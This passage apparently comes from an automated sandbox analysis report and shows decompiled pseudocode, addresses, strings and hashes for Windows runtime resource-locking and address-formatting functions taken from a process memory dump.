						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d001c0;
									_push(_t144);
									_push(0);
									_t51 = E00C1F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00C64FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00C73F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00C73F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00CA217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00C73F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00C63915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d001c0;
												_push(_t138);
												_push(0);
												_t58 = E00C1F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00C64FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00C73F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00C73F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00CA217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00C73F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00C63915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00C45384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00C1F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00C63915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00C1F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00C63915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00C1F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00C63915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00C45329(_t110, _t138);
																_t69 = E00C453A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x00c6055a
0x00c6055d
0x00c60563
0x00c60566
0x00c605d8
0x00c605e2
0x00c605e5
0x00000000
0x00c605e7
0x00c605e7
0x00c605ea
0x00c605f3
0x00c605f3
0x00c60568
0x00c60568
0x00c60568
0x00c60569
0x00c60569
0x00c60569
0x00c6056b
0x00000000
0x00000000
0x00c8217f
0x00c82183
0x00c8225b
0x00c8225f
0x00c82189
0x00c8218c
0x00c8218f
0x00c82194
0x00c82199
0x00c8219d
0x00c821a0
0x00c821a2
0x00c821ce
0x00c821ce
0x00c821ce
0x00c821d0
0x00c821d6
0x00c821de
0x00c821e2
0x00c821e8
0x00c821e9
0x00c821ec
0x00c821f1
0x00c821f6
0x00000000
0x00000000
0x00c821f8
0x00c821fb
0x00c82206
0x00c8220b
0x00c8220c
0x00c82217
0x00c82226
0x00c8222b
0x00c8222c
0x00c8222f
0x00c82232
0x00c82235
0x00c82235
0x00c8223a
0x00c8223f
0x00c82241
0x00c82243
0x00c82248
0x00c82248
0x00c8224d
0x00c8224f
0x00c82262
0x00c82263
0x00c82268
0x00c82269
0x00c82269
0x00c82269
0x00c8226d
0x00000000
0x00000000
0x00c82276
0x00c82279
0x00c8227e
0x00c82283
0x00c82287
0x00c8228a
0x00c8228d
0x00c8228f
0x00c822bc
0x00c822bc
0x00c822bc
0x00c822be
0x00c822c4
0x00c822cc
0x00c822d0
0x00c822d6
0x00c822d7
0x00c822da
0x00c822df
0x00c822e4
0x00000000
0x00000000
0x00c822e6
0x00c822e9
0x00c822f4
0x00c822f9
0x00c822fa
0x00c82305
0x00c82314
0x00c82319
0x00c8231a
0x00c8231d
0x00c82320
0x00c82323
0x00c82323
0x00c82328
0x00c8232d
0x00c8232f
0x00c82331
0x00c82336
0x00c82336
0x00c8233b
0x00c8233d
0x00c82350
0x00c82351
0x00c82356
0x00c82359
0x00c82359
0x00c8235b
0x00c8235d
0x00c45367
0x00c4536b
0x00c45372
0x00000000
0x00000000
0x00000000
0x00000000
0x00c82363
0x00c82363
0x00c82369
0x00c8236a
0x00c8236c
0x00c82371
0x00c82373
0x00000000
0x00c82379
0x00c82379
0x00c8237a
0x00c8237f
0x00c8237f
0x00c82385
0x00c82386
0x00c82389
0x00c8238e
0x00c82390
0x00c45378
0x00c4537c
0x00c82396
0x00c82396
0x00c82397
0x00c8239c
0x00c823a2
0x00c823a3
0x00c823a6
0x00c823ab
0x00c823ad
0x00000000
0x00c823b3
0x00c823b3
0x00c823b4
0x00c823b9
0x00c823ba
0x00c823ba
0x00c823bc
0x00c823bf
0x00000000
0x00000000
0x00c79153
0x00c79158
0x00c7915a
0x00c7915e
0x00c79160
0x00000000
0x00c79166
0x00c79166
0x00c79171
0x00c79176
0x00c79176
0x00000000
0x00c79160
0x00c823c6
0x00c823ce
0x00c823d7
0x00c823d7
0x00c823ad
0x00c82390
0x00c82373
0x00c8233f
0x00c8233f
0x00000000
0x00c8233f
0x00c82291
0x00c82291
0x00c82293
0x00c82295
0x00c8229a
0x00c822a1
0x00c822a3
0x00c822a7
0x00c822a9
0x00000000
0x00000000
0x00c822ab
0x00c822ad
0x00c822af
0x00000000
0x00000000
0x00000000
0x00c822af
0x00c822b1
0x00c822b4
0x00c822b4
0x00c822b6
0x00c453be
0x00c453be
0x00c453be
0x00c453c0
0x00000000
0x00000000
0x00c453cb
0x00c453ce
0x00c453d0
0x00c453d4
0x00c453d6
0x00000000
0x00c453d8
0x00c453e3
0x00c453ea
0x00c453ea
0x00000000
0x00c453d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00c822b6
0x00000000
0x00c8228f
0x00c82349
0x00c8234d
0x00c82251
0x00c82251
0x00000000
0x00c82251
0x00c821a4
0x00c821a4
0x00c821a6
0x00c821a8
0x00c821ac
0x00c821b6
0x00c821b8
0x00c821bc
0x00c821be
0x00000000
0x00000000
0x00c821c0
0x00c821c2
0x00c821c4
0x00000000
0x00000000
0x00000000
0x00c821c4
0x00c821c6
0x00c821c6
0x00c821c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00c821c8
0x00c821a2
0x00000000
0x00c82183
0x00c6057b
0x00c6057d
0x00c60581
0x00c60583
0x00c82178
0x00000000
0x00c60589
0x00c6058f
0x00c6058f
0x00c60583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C82206

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00C822FC
RTL: Resource at %p, xrefs: 00C8221D, 00C8230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00C8220E
RTL: Re-Waiting, xrefs: 00C8223A, 00C82328

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: ac8123ff0001ab3ecbf0007c405000c2a64234daf0c2487fdf38481b83feb498
Instruction ID: 8003d147ce6ae39c7cb6f0872c923d6d449a0a43590b229075ff58b469de02b2
Opcode Fuzzy Hash: ac8123ff0001ab3ecbf0007c405000c2a64234daf0c2487fdf38481b83feb498
Instruction Fuzzy Hash: 07517C317002116FEB24DE18CCC5FA733A9AF94724F318269FC59DB285D971ED419B94

Uniqueness

Uniqueness Score: -1.00%

Function 00C614C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00C614C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xd02088; // 0x7751fe44
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00C57707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00C613CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00C57707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00C57707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00C22340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00C2E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x00c614c0
0x00c614cb
0x00c614d2
0x00c614d6
0x00c614da
0x00c614de
0x00c614e3
0x00c6157a
0x00c6157a
0x00c614f1
0x00c614f3
0x00c8ea0f
0x00000000
0x00c8ea15
0x00000000
0x00c8ea15
0x00c614f9
0x00c614f9
0x00c614fe
0x00c61504
0x00c8ea1a
0x00c8ea1f
0x00c8ea21
0x00c8ea22
0x00c8ea27
0x00c8ea2a
0x00c8ea2a
0x00c61515
0x00c61517
0x00c6156d
0x00c61572
0x00c61575
0x00c61575
0x00c6151e
0x00c8ea50
0x00c8ea55
0x00c8ea58
0x00c8ea58
0x00c6152e
0x00c61531
0x00c61533
0x00000000
0x00c61535
0x00c61541
0x00c61549
0x00c61549
0x00c61533
0x00c614f3
0x00c61559

APIs

___swprintf_l.LIBCMT ref: 00C8EA22

Part of subcall function 00C613CB: ___swprintf_l.LIBCMT ref: 00C6146B
Part of subcall function 00C613CB: ___swprintf_l.LIBCMT ref: 00C61490

___swprintf_l.LIBCMT ref: 00C6156D

Strings

%%%u, xrefs: 00C61564
]:%u, xrefs: 00C8EA47

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: d5f0b57166a26fdfdf4404b719f6209aad504310998323bd71144d9d369970c7
Instruction ID: 467ad4a59472eddeb952ff800612c926ee2a8727585063aea9391c8052b27e0d
Opcode Fuzzy Hash: d5f0b57166a26fdfdf4404b719f6209aad504310998323bd71144d9d369970c7
Instruction Fuzzy Hash: 1321B1729002299BCB31EE54DC85AEEB3ACEB54701F484165FC56D3140DB70EA989BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00C453A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00C453A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00d001c0;
									_push(_t92);
									_push(0);
									_t37 = E00C1F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00C64FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00C73F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00C73F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00CA217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00C73F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00C63915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00C45384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00C1F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00C63915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00C1F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00C63915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00C1F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00C63915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00C45329(_t74, _t92);
													_push(1);
													_t48 = E00C453A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x00c453ab
0x00c453ae
0x00c453b1
0x00c453b4
0x00c453b7
0x00c605b6
0x00c605c0
0x00c605c3
0x00000000
0x00c605c9
0x00c605c9
0x00c605cc
0x00c605d5
0x00c605d5
0x00c453bd
0x00c453bd
0x00c453bd
0x00c453be
0x00c453be
0x00c453be
0x00c453c0
0x00000000
0x00000000
0x00c82269
0x00c8226d
0x00c82349
0x00c8234d
0x00c82273
0x00c82276
0x00c82279
0x00c8227e
0x00c82283
0x00c82287
0x00c8228a
0x00c8228d
0x00c8228f
0x00c822bc
0x00c822bc
0x00c822bc
0x00c822be
0x00c822c4
0x00c822cc
0x00c822d0
0x00c822d6
0x00c822d7
0x00c822da
0x00c822df
0x00c822e4
0x00000000
0x00000000
0x00c822e6
0x00c822e9
0x00c822f4
0x00c822f9
0x00c822fa
0x00c82305
0x00c82314
0x00c82319
0x00c8231a
0x00c8231d
0x00c82320
0x00c82323
0x00c82323
0x00c82328
0x00c8232d
0x00c8232f
0x00c82331
0x00c82336
0x00c82336
0x00c8233b
0x00c8233d
0x00c82350
0x00c82351
0x00c82356
0x00c82359
0x00c82359
0x00c8235b
0x00c8235d
0x00c45367
0x00c4536b
0x00c45372
0x00000000
0x00000000
0x00000000
0x00000000
0x00c82363
0x00c82363
0x00c82369
0x00c8236a
0x00c8236c
0x00c82371
0x00c82373
0x00000000
0x00c82379
0x00c82379
0x00c8237a
0x00c8237f
0x00c8237f
0x00c82385
0x00c82386
0x00c82389
0x00c8238e
0x00c82390
0x00c45378
0x00c4537c
0x00c82396
0x00c82396
0x00c82397
0x00c8239c
0x00c823a2
0x00c823a3
0x00c823a6
0x00c823ab
0x00c823ad
0x00000000
0x00c823b3
0x00c823b3
0x00c823b4
0x00c823b9
0x00c823ba
0x00c823ba
0x00c823bc
0x00c823bf
0x00000000
0x00000000
0x00c79153
0x00c79158
0x00c7915a
0x00c7915e
0x00c79160
0x00000000
0x00c79166
0x00c79166
0x00c79171
0x00c79176
0x00c79176
0x00000000
0x00c79160
0x00c823c6
0x00c823cb
0x00c823ce
0x00c823d7
0x00c823d7
0x00c823ad
0x00c82390
0x00c82373
0x00c8233f
0x00c8233f
0x00000000
0x00c8233f
0x00c82291
0x00c82291
0x00c82293
0x00c82295
0x00c8229a
0x00c822a1
0x00c822a3
0x00c822a7
0x00c822a9
0x00000000
0x00000000
0x00c822ab
0x00c822ad
0x00c822af
0x00000000
0x00000000
0x00000000
0x00c822af
0x00c822b1
0x00c822b4
0x00c822b4
0x00c822b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00c822b6
0x00c8228f
0x00000000
0x00c8226d
0x00c453cb
0x00c453ce
0x00c453d0
0x00c453d4
0x00c453d6
0x00000000
0x00c453d8
0x00c453e3
0x00c453ea
0x00c453ea
0x00c453d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C822F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00C822FC
RTL: Resource at %p, xrefs: 00C8230B
RTL: Re-Waiting, xrefs: 00C82328

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: c788bada4b572e5b261a79de1995586bacb7a3052560dbb9910d2ccd79af64b2
Instruction ID: 007a587d0208419e5f259cb9b95c6f253ecb6776fb44f224553aba27fd3ebb87
Opcode Fuzzy Hash: c788bada4b572e5b261a79de1995586bacb7a3052560dbb9910d2ccd79af64b2
Instruction Fuzzy Hash: AC5148716007066BDB24EF28DC81FA7739CEF59364F104229FD18DB292EA71ED419BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C4EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00C4EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00C3DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xd0793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00C216C0(_t39);
				} else {
					_t40 = E00C1F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00C63915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00C201A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xd0793c; // 0x0
								_push(_t85);
